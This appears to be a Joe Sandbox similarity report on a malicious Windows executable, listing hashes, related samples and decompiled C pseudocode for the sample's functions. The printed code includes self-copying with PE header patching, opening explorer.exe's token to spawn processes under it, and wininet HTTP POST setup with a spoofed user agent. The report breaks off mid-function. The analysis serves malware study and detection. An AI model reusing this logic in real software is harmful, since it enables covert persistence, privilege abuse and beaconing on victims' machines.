Loading ...

Similarity Report

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:675819
Start date:28.09.2018
Start time:11:18:22
Joe Sandbox Product:Cloud
Overall analysis duration:0h 2m 21s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:P8Wo4avJbj (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.winEXE@1/2@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 74.4% (good quality ratio 73.1%)
  • Quality average: 91%
  • Quality standard deviation: 18.6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 3
  • Number of non-executed functions: 46
Cookbook Comments:
  • Adjust boot time
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.006589492266663
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:P8Wo4avJbj.exe
File size:17408
MD5:595aff5212df3534fb8af6a587c6038e
SHA1:1771e435ba25f9cdfa77168899490d87681f2029
SHA256:dcbfd12321fa7c4fa9a72486ced578fdc00dcee79e6d95aa481791f044a55af3
SHA512:281d601178ac8a1e589a3ae8ba0e324b180aa3dde121eee399448beb6752b67c0cf0add7a99913816e23d9985bf9a2b1dee7495ca018f1583cab52b30d7607e0
File Content Preview:MZ.............j........@........................................j.......+L$.J"w.J"w.J"w.B.w.J"w'B.w.J"w.J#w.J"w.J"w.J"w.F}w.J"w.FBw.J"w.F~w.J"w.Fxw.J"wRich.J"w........PE..L...k..G.................6...........4.......P....@................................

Similarity Information

Algorithm:APISTRING
Total Signature IDs in Database:4802801
Total Processes Database:56914
Total similar Processes:3
Total similar Functions:260

Similar Processes

  • P8Wo4avJbj.exe (MD5: 595AFF5212DF3534FB8AF6A587C6038E, PID: 3000)
    • rEF274uSok.exe (PID: 3428, MD5: CF45EC807321D12F8DF35FA434591460 AnalysisID: 57816 Similar Functions: 88)
    • dRoYbhso1n.exe (PID: 3428, MD5: 6EAA1FF5F33DF3169C209F98CC5012D0 AnalysisID: 57815 Similar Functions: 88)
    • x2f5mqUHUN.exe (PID: 3424, MD5: F391556D9F89499FA8EE757CB3472710 AnalysisID: 57817 Similar Functions: 84)

Similar Functions

  • Function_00003358 API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle, String ID: , Total Matches: 6
  • Function_00002B08 API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen, String ID: dll$exe, Total Matches: 6
  • Function_00002B08 API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen, String ID: dll$exe, Total Matches: 6
  • Function_00002C05 API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage, String ID: , Total Matches: 6
  • Function_00003734 API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat, String ID: [FILE]$SystemRoot$[FILE], Total Matches: 6
  • Function_00003358 API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle, String ID: , Total Matches: 6
  • Function_00001F4E API ID: lstrcpy, String ID: ($TagId, Total Matches: 6
  • Function_00002165 API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent, String ID: x, Total Matches: 6
  • Function_00001466 API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject, String ID: , Total Matches: 6
  • Function_00001E99 API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority, String ID: , Total Matches: 6
  • Function_00003094 API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess, String ID: , Total Matches: 6
  • Function_00002997 API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory, String ID: , Total Matches: 6
  • Function_00001ABC API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject, String ID: , Total Matches: 6
  • Function_000023B1 API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent, String ID: d, Total Matches: 6
  • Function_00001BAA API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject, String ID: , Total Matches: 6
  • Function_000035DB API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx, String ID: , Total Matches: 6
  • Function_000017D0 API ID: WaitForSingleObject$ReadFileResetEvent, String ID: , Total Matches: 6
  • Function_000019F3 API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject, String ID: , Total Matches: 6
  • Function_00002DE5 API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken, String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE], Total Matches: 6
  • Function_000027E6 API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects, String ID: <, Total Matches: 6
  • rpcnetp API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler, String ID: rpcnetp, Total Matches: 6
  • Function_00001F4E API ID: lstrcpy, String ID: ($TagId, Total Matches: 6
  • Function_00002165 API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent, String ID: x, Total Matches: 6
  • Function_00001466 API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject, String ID: , Total Matches: 6
  • Function_00002C05 API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage, String ID: , Total Matches: 6
  • Function_00003734 API ID: GetEnvironmentVariableRegCloseKeyRegOpenKeyRegQueryValueExlstrcat, String ID: [FILE]$SystemRoot$[FILE], Total Matches: 6
  • Function_000017D0 API ID: WaitForSingleObject$ReadFileResetEvent, String ID: , Total Matches: 6
  • Function_000035DB API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx, String ID: , Total Matches: 6
  • rpcnetp API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler, String ID: rpcnetp, Total Matches: 6
  • Function_00002DE5 API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken, String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE], Total Matches: 6
  • Function_000027E6 API ID: GetStdHandle$CloseHandleCreateRemoteThreadResumeThreadWaitForMultipleObjects, String ID: <, Total Matches: 6
  • Function_000019F3 API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject, String ID: , Total Matches: 6
  • Function_00003094 API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess, String ID: , Total Matches: 6
  • Function_00002997 API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory, String ID: , Total Matches: 6
  • Function_00001E99 API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority, String ID: , Total Matches: 6
  • Function_00001BAA API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject, String ID: , Total Matches: 6
  • Function_000023B1 API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent, String ID: d, Total Matches: 6
  • Function_00001ABC API ID: CloseHandleLocalFreeTerminateThreadWaitForSingleObject, String ID: , Total Matches: 6
  • Function_00002648 API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup, String ID: , Total Matches: 5
  • Function_00002CC7 API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf, String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE], Total Matches: 5
  • Function_00002648 API ID: CreateThreadGetCurrentThreadIdLocalAllocPeekMessagePostMessageSetThreadPriorityWSACleanupWSAStartup, String ID: , Total Matches: 5
  • Function_00002CC7 API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf, String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE], Total Matches: 5
  • Function_00003020 API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects, String ID: , Total Matches: 3
  • Function_00003683 API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen, String ID: , Total Matches: 3
  • Function_00003020 API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects, String ID: !$@, Total Matches: 3
  • Function_00003683 API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen, String ID: !$@, Total Matches: 3

General

Root Process Name:P8Wo4avJbj.exe
Process MD5:CF45EC807321D12F8DF35FA434591460
Total matches:88
Initial Analysis Report:Open
Initial sample Analysis ID:57816
Initial sample SHA 256:0860F29226069A732F988CB70EA6D51057D204D421BB709B8E759376B0C4D201
Initial sample name:rEF274uSo.exe

Similar Executed Functions

Similarity
  • Total matches: 6
  • API ID: lstrcpy$CloseHandleCopyFileCreateFileGetModuleFileNameSetFilePointerWriteFilelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 1827060118-2048111982
  • Opcode ID: c3885fe13371a926e81591ffe00ebdc536067f9240e3e9512f9da992c1313499
  • Instruction ID: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
  • Opcode Fuzzy Hash: 52F0E98E0D8E83C5D466A3477C95BF311417742D9AD4D97B079D97298F6F12A208EF04
  • Instruction Fuzzy Hash: 57b1cbd0d537261b9f72dfb42b8f065b65fb383f86c9acaf781157f8dac982d0
C-Code - Quality: 100%
			E00402B08(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t20;
				int _t23;
				int _t24;
				struct HINSTANCE__* _t27;
				void _t30;
				CHAR* _t36;
				long _t42;
				CHAR* _t44;
				void* _t46;

				_t20 = GetModuleFileNameA( *0x405044,  &_v268, 0x104);
				if(_t20 == 0) {
					return _t20;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t44 = _a4;
				lstrcpyA(_t44,  &_v268);
				_t23 = lstrlenA(_t44);
				_t9 = _t44 - 3; // -3
				_t36 = _t23 + _t9;
				_t24 = lstrcmpiA(_t36, _v8); // executed
				if(_t24 != 0) {
					lstrcpyA(_t36, _v8);
					_t24 = CopyFileA( &_v268, _t44, 0); // executed
					if(_t24 != 0) {
						_t24 = CreateFileA(_t44, 0xc0000000, 3, 0, 3, 0, 0); // executed
						_t46 = _t24;
						if(_t46 != 0xffffffff) {
							_t27 =  *0x405044; // 0x400000
							_t12 = _t27 + 0x3c; // 0xa8
							_t42 =  *_t12 + _t27 - _t27 + 0x16;
							_a4 = _t42;
							if(_a8 != 0) {
								_t30 = 0;
							} else {
								_t30 = 0x2000;
							}
							_a8 = _t30;
							SetFilePointer(_t46, _t42, 0, 0); // executed
							WriteFile(_t46,  &_a8, 2,  &_a4, 0); // executed
							_t24 = CloseHandle(_t46);
						}
					}
				}
				return _t24;
			}














0x00402b23
0x00402b2b
0x00402c02
0x00402c02
0x00402b35
0x00402b3c
0x00402b3e
0x00402b3e
0x00402b4e
0x00402b59
0x00402b5c
0x00402b65
0x00402b65
0x00402b6a
0x00402b72
0x00402b7c
0x00402b89
0x00402b91
0x00402ba0
0x00402ba6
0x00402bab
0x00402bad
0x00402bb2
0x00402bbb
0x00402bc3
0x00402bca
0x00402bd3
0x00402bcc
0x00402bcc
0x00402bcc
0x00402bdc
0x00402bdf
0x00402bf1
0x00402bf8
0x00402bf8
0x00402bab
0x00402b91
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00402B23
  • lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 00402B59
  • lstrlenA.KERNEL32(?), ref: 00402B5C
  • lstrcmpi.KERNEL32(-00000003,004011C8), ref: 00402B6A
  • lstrcpyA.KERNEL32(-00000003,004011C8), ref: 00402B7C
  • CopyFileA.KERNEL32(?,?,00000000), ref: 00402B89
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00402BA0
  • SetFilePointer.KERNELBASE(00000000,00000092,00000000,00000000), ref: 00402BDF
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 00402BF1
  • CloseHandle.KERNEL32(00000000), ref: 00402BF8
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp
Similarity
  • Total matches: 6
  • API ID: CloseHandle$WaitForSingleObject$CreateEventCreateThreadExitProcessGetStdHandleGetVersionSetStdHandle
  • String ID:
  • API String ID: 4158509741-0
  • Opcode ID: 2ad7749c4b6b29532a42bdd3babab8e75ff4bd89d39d064bb05a7080b22e26a8
  • Instruction ID: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
  • Opcode Fuzzy Hash: 1FF02D8822485981C46BAD007CF4FB125448B1765FD98B7143F6D7816F3785B1457F9A
  • Instruction Fuzzy Hash: 1f66a28011c897b0d121599fcf6742e47d01aa91f08c6217b59ea673e7e77bb8
C-Code - Quality: 96%
			E00403358() {
				long _v4;
				void* _v8;
				long _t8;
				void* _t10;
				void* _t11;
				void* _t17;
				intOrPtr _t23;
				intOrPtr _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t42;

				_t8 = GetVersion();
				_t42 =  *0x4050b0; // 0x0
				 *0x405070 = _t8;
				if(_t42 == 0 && _t8 < 0) {
					 *0x40506c =  *0x40506c | 0xffffffff;
				}
				_push(_t31);
				_v8 = GetStdHandle(0xfffffff4);
				_t10 = E00402A43(); // executed
				_t36 = _t10;
				if(_t36 == 0) {
					L10:
					_t11 =  *0x40506c; // 0x0
					__eflags = _t11;
					if(_t11 != 0) {
						__eflags = _t11 - 2;
						if(_t11 == 2) {
							L22:
							if(_v8 != 0) {
								CloseHandle(_v8);
							}
							ExitProcess(0);
						}
						__eflags = _t36;
						if(_t36 != 0) {
							L16:
							 *0x4050c8 = CreateEventA(0, 0, 0, 0);
							L17:
							_t33 = CreateThread(0, 0, E00402C05, 0, 0,  &_v4);
							__eflags = _t33;
							if(_t33 != 0) {
								_t17 =  *0x4050c8; // 0x0
								__eflags = _t17;
								if(_t17 != 0) {
									WaitForSingleObject(_t17, 0xffffffff);
									CloseHandle( *0x4050c8);
									 *0x4050c8 = 0;
								}
								WaitForSingleObject(_t33, 0xffffffff);
								CloseHandle(_t33);
							}
							L21:
							E00402FA0(_t30, 0);
							goto L22;
						}
						__eflags = _t11 - 0xffffffff;
						if(_t11 != 0xffffffff) {
							goto L17;
						}
						goto L16;
					}
					__eflags = _t36;
					if(_t36 != 0) {
						goto L16;
					}
					E00401626();
					goto L22;
				}
				_t23 =  *0x4050b4; // 0x1d6000
				 *0x405048 = 0;
				_t46 =  *((intOrPtr*)(_t23 + 0x28));
				if( *((intOrPtr*)(_t23 + 0x28)) != 0) {
					 *0x40506c = 1;
					SetStdHandle(0xfffffff6, _v8);
					goto L10;
				}
				 *0x40506c = 2;
				_t34 = E00402DE5(0, _t31, _t36, _t46);
				_t26 =  *0x4050b4; // 0x1d6000
				 *(_t26 + 0x28) = 1;
				_t27 = E00403094(0, _t30, _t34, _t36, _t46, _t34);
				asm("sbb esi, esi");
				_t36 = 1 +  ~_t27;
				if(_t34 != 0) {
					CloseHandle(_t34);
				}
				if(_t36 != 0) {
					goto L10;
				} else {
					goto L21;
				}
			}


















0x0040335c
0x00403364
0x0040336a
0x0040336f
0x00403375
0x00403375
0x0040337d
0x00403386
0x0040338a
0x00403395
0x00403399
0x004033fb
0x004033fb
0x00403400
0x00403402
0x0040340f
0x00403412
0x00403476
0x0040347c
0x00403482
0x00403482
0x00403485
0x00403485
0x00403414
0x00403416
0x0040341d
0x00403427
0x0040342c
0x00403440
0x00403442
0x00403444
0x00403446
0x0040344b
0x00403453
0x00403458
0x00403460
0x00403462
0x00403462
0x0040346b
0x0040346e
0x0040346e
0x00403470
0x00403471
0x00000000
0x00403471
0x00403418
0x0040341b
0x00000000
0x00000000
0x00000000
0x0040341b
0x00403404
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x0040339b
0x004033a0
0x004033a6
0x004033a9
0x004033e9
0x004033f5
0x00000000
0x004033f5
0x004033ab
0x004033ba
0x004033bc
0x004033c2
0x004033c9
0x004033d2
0x004033d4
0x004033d7
0x004033da
0x004033da
0x004033de
0x00000000
0x004033e0
0x00000000
0x004033e0

APIs
  • GetVersion.KERNEL32 ref: 0040335C
  • GetStdHandle.KERNEL32(000000F4), ref: 00403380
    • Part of subcall function 00402A43: LoadLibraryA.KERNEL32(?), ref: 00402A6F
    • Part of subcall function 00402A43: GetCurrentProcessId.KERNEL32 ref: 00402AA1
  • SetStdHandle.KERNEL32(000000F6,?), ref: 004033F5
    • Part of subcall function 00402DE5: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00402E03
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E22
    • Part of subcall function 00402DE5: GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E35
    • Part of subcall function 00402DE5: LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E4A
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402E6D
    • Part of subcall function 00402DE5: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EAC
    • Part of subcall function 00402DE5: OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EC5
    • Part of subcall function 00402DE5: CloseHandle.KERNEL32(00000000), ref: 00402ECC
    • Part of subcall function 00402DE5: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402EF5
    • Part of subcall function 00402DE5: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401448,00000028), ref: 00402F04
    • Part of subcall function 00403094: GetCurrentProcessId.KERNEL32(00401410,00000184,00403308,00000000,00000001,00000113,?,?,00402421), ref: 004030B4
    • Part of subcall function 00403094: OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,00402421), ref: 004030C1
    • Part of subcall function 00403094: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 00403151
    • Part of subcall function 00403094: SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 00403169
    • Part of subcall function 00403094: CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00403197
    • Part of subcall function 00403094: CloseHandle.KERNEL32(00000000), ref: 004031A8
    • Part of subcall function 00403094: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 004031C8
    • Part of subcall function 00403094: TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040322D
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403236
    • Part of subcall function 00403094: CloseHandle.KERNEL32(?), ref: 00403247
    • Part of subcall function 00403094: CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 0040326D
    • Part of subcall function 00403094: SetStdHandle.KERNEL32(000000F6,00000000), ref: 0040327B
  • CloseHandle.KERNEL32(00000000), ref: 004033DA
  • ExitProcess.KERNEL32 ref: 00403485
    • Part of subcall function 00401626: StartServiceCtrlDispatcherA.ADVAPI32(00405034,0040340D), ref: 0040162B
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403421
  • CreateThread.KERNEL32(00000000,00000000,Function_00002C05,00000000,00000000,?), ref: 0040343A
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403458
  • CloseHandle.KERNEL32 ref: 00403460
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040346B
  • CloseHandle.KERNEL32(00000000), ref: 0040346E
  • CloseHandle.KERNEL32(?), ref: 00403482
Memory Dump Source
  • Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
  • Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
  • Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Similar Non-Executed Functions

Similarity
  • Total matches: 6
  • API ID: GetProcAddressLocalFree$CloseHandleFreeLibraryLoadLibraryLocalAllocOpenProcessOpenProcessToken
  • String ID: NtQuerySystemInformation$_wcsicmp$[FILE]$[FILE]
  • API String ID: 871439847-2760969069
  • Opcode ID: 79303f3461f55357ea3caebb2c463ba2263ea78e754b615967e539c6771ee5b5
  • Instruction ID: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
  • Opcode Fuzzy Hash: 48F04686904A97F1E623B9C8196D36164553FA17C8E0D8631B21038912B7AF322A7F80
  • Instruction Fuzzy Hash: d143e7d7f0a7e528b80bb3ef837344cc21e5cd4fbee9c201c5a4592c151db2c3
C-Code - Quality: 96%
			E001D2DE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				void* _t38;
				intOrPtr _t40;
				void _t41;
				int _t42;
				struct HINSTANCE__* _t49;
				void* _t50;
				long _t54;
				void* _t58;
				void* _t59;
				void* _t60;

				_push(0x28);
				_push(0x1d1448);
				E001D1637(__ebx, __edi, __esi);
				 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
				_t54 = 0x10000;
				 *(_t60 - 0x24) =  *(_t60 - 0x24) & 0x00000000;
				_t49 = LoadLibraryA("ntdll.dll");
				 *(_t60 - 0x20) = _t49;
				if(_t49 == 0) {
					L17:
					if( *(_t60 - 0x20) != 0) {
						FreeLibrary( *(_t60 - 0x20));
					}
					if( *(_t60 - 0x1c) != 0) {
						LocalFree( *(_t60 - 0x1c));
					}
					return E001D173E( *(_t60 - 0x24));
				}
				_t36 = GetProcAddress(_t49, "NtQuerySystemInformation");
				 *(_t60 - 0x28) = _t36;
				if(_t36 == 0) {
					goto L17;
				}
				_t37 = GetProcAddress(_t49, "_wcsicmp");
				 *(_t60 - 0x2c) = _t37;
				if(_t37 == 0) {
					goto L17;
				}
				while(1) {
					_t38 = LocalAlloc(0x40, _t54);
					 *(_t60 - 0x1c) = _t38;
					if(_t38 == 0) {
						goto L17;
					}
					_t50 =  *(_t60 - 0x28)(5, _t38, _t54, 0);
					if(_t50 != 0xc0000004) {
						if(_t50 < 0) {
							goto L17;
						}
						L8:
						if(_t50 == 0xc0000004) {
							continue;
						}
						_t58 =  *(_t60 - 0x1c);
						 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
						while(1) {
							_t40 =  *((intOrPtr*)(_t58 + 0x3c));
							 *((intOrPtr*)(_t60 - 0x30)) = _t40;
							if(_t40 == 0) {
								goto L14;
							}
							_t42 =  *(_t60 - 0x2c)(_t40, L"explorer.exe");
							if(_t42 != 0) {
								goto L14;
							}
							_t59 = OpenProcess(0x410, _t42,  *(_t58 + 0x44));
							 *(_t60 - 0x34) = _t59;
							if(_t59 != 0) {
								OpenProcessToken(_t59, 0x200ff, _t60 - 0x24);
								CloseHandle(_t59);
							}
							L16:
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							goto L17;
							L14:
							_t41 =  *_t58;
							if(_t41 == 0) {
								goto L16;
							}
							_t58 = _t58 + _t41;
							 *(_t60 - 0x38) = _t58;
						}
					}
					LocalFree( *(_t60 - 0x1c));
					 *(_t60 - 0x1c) =  *(_t60 - 0x1c) & 0x00000000;
					_t54 = _t54 + _t54;
					goto L8;
				}
				goto L17;
			}















0x001d2de5
0x001d2de7
0x001d2dec
0x001d2df1
0x001d2df5
0x001d2dfa
0x001d2e09
0x001d2e0b
0x001d2e10
0x001d2eec
0x001d2ef0
0x001d2ef5
0x001d2ef5
0x001d2eff
0x001d2f04
0x001d2f04
0x001d2f12
0x001d2f12
0x001d2e22
0x001d2e24
0x001d2e29
0x00000000
0x00000000
0x001d2e35
0x001d2e37
0x001d2e3c
0x00000000
0x00000000
0x001d2e47
0x001d2e4a
0x001d2e50
0x001d2e55
0x00000000
0x00000000
0x001d2e64
0x001d2e68
0x001d2e7d
0x00000000
0x00000000
0x001d2e7f
0x001d2e81
0x00000000
0x00000000
0x001d2e83
0x001d2e86
0x001d2e8a
0x001d2e8a
0x001d2e8d
0x001d2e92
0x00000000
0x00000000
0x001d2e9a
0x001d2ea1
0x00000000
0x00000000
0x001d2eb2
0x001d2eb4
0x001d2eb9
0x001d2ec5
0x001d2ecc
0x001d2ecc
0x001d2ee8
0x001d2ee8
0x00000000
0x001d2ed4
0x001d2ed4
0x001d2ed8
0x00000000
0x00000000
0x001d2eda
0x001d2edc
0x001d2edc
0x001d2e8a
0x001d2e6d
0x001d2e73
0x001d2e77
0x00000000
0x001d2e77
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 001D2E03
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E22
  • GetProcAddress.KERNEL32(00000000,_wcsicmp,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E35
  • LocalAlloc.KERNEL32(00000040,00010000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E4A
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2E6D
  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EAC
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EC5
  • CloseHandle.KERNEL32(00000000), ref: 001D2ECC
  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2EF5
  • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,001D1448,00000028), ref: 001D2F04
Strings
Memory Dump Source
  • Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true
  • Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
  • Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
  • Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp
Similarity
  • Total matches: 5
  • API ID: FreeLibraryGetProcAddressLoadLibraryinet_ntoawsprintf
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 6.0;)$POST$TagId$[FILE]
  • API String ID: 3761191649-3458657377
  • Opcode ID: 2aee25d4d97340da8d57a5187acebaa494bf19f8195fcf1f0a5fcee18dc65b62
  • Instruction ID: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
  • Opcode Fuzzy Hash: 3CF04C85081F07F5FC33A941245D77DE780BF95AC2DCCF9155622D6A235A4D32189741
  • Instruction Fuzzy Hash: 5c5cc2a2a5d0c80c85ef90c9e54d4eb75811ab3963221f16da9f65b959107efc
C-Code - Quality: 94%
			E001D2CC7(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v40;
				signed int _t30;
				_Unknown_base(*)()* _t32;
				signed int _t34;
				signed int _t35;
				intOrPtr* _t36;
				signed int _t43;
				void* _t51;
				signed int* _t54;

				_v8 = 0x4e20;
				_t30 = LoadLibraryA("wininet.dll");
				_t54 = _a4;
				_t54[0xd] = _t30;
				if(_t30 != 0) {
					_a4 =  &(_t54[3]);
					_t51 = 0;
					while(1) {
						_t6 = _t51 + 0x1d500c; // 0x1d12c8
						_t32 = GetProcAddress(_t54[0xd],  *_t6);
						 *_a4 = _t32;
						if(_t32 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t51 = _t51 + 4;
						if(_t51 < 0x28) {
							continue;
						}
						_t35 = _t54[3]("Mozilla/4.0 (compatible; MSIE 6.0;)", 0, 0, 0, 0);
						 *_t54 = _t35;
						if(_t35 != 0) {
							if(_a16 != 0) {
								_t36 = _a12;
								_push( *_t36);
								L001D3826();
							} else {
								_t36 = _a8;
							}
							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
